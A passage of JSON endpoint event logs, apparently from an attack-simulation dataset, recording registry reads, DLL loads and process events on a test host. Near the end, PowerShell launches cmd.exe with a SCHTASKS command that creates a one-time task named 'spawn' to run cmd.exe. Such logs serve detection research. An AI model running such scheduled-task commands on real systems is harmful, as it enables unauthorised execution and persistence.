131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "schedcli.dll", - "image_path": "C:\\Windows\\System32\\schedcli.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - 
"timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803860000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803860000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "process", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "subtype": "terminate", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "process", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msv1_0.dll", - "image_path": "C:\\Windows\\System32\\msv1_0.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803860000, - "unique_pid": 
"{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "NtlmShared.dll", - "image_path": "C:\\Windows\\System32\\NtlmShared.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803860000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6764, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573804120000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 
131883573804009984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "file", - "file_name": "AT.EXE-E3131BD4.pf", - "file_path": "C:\\Windows\\Prefetch\\AT.EXE-E3131BD4.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1776, - "ppid": 7036, - "process_name": "cmd.exe", - 
